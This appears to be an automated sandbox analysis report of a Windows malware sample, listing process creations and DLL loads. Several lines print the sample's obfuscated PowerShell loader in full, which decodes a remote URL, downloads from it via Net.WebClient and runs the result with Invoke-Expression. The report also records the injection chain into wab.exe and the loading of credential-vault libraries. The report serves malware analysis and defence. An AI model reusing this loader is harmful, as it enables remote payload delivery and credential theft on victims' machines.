AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
              Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
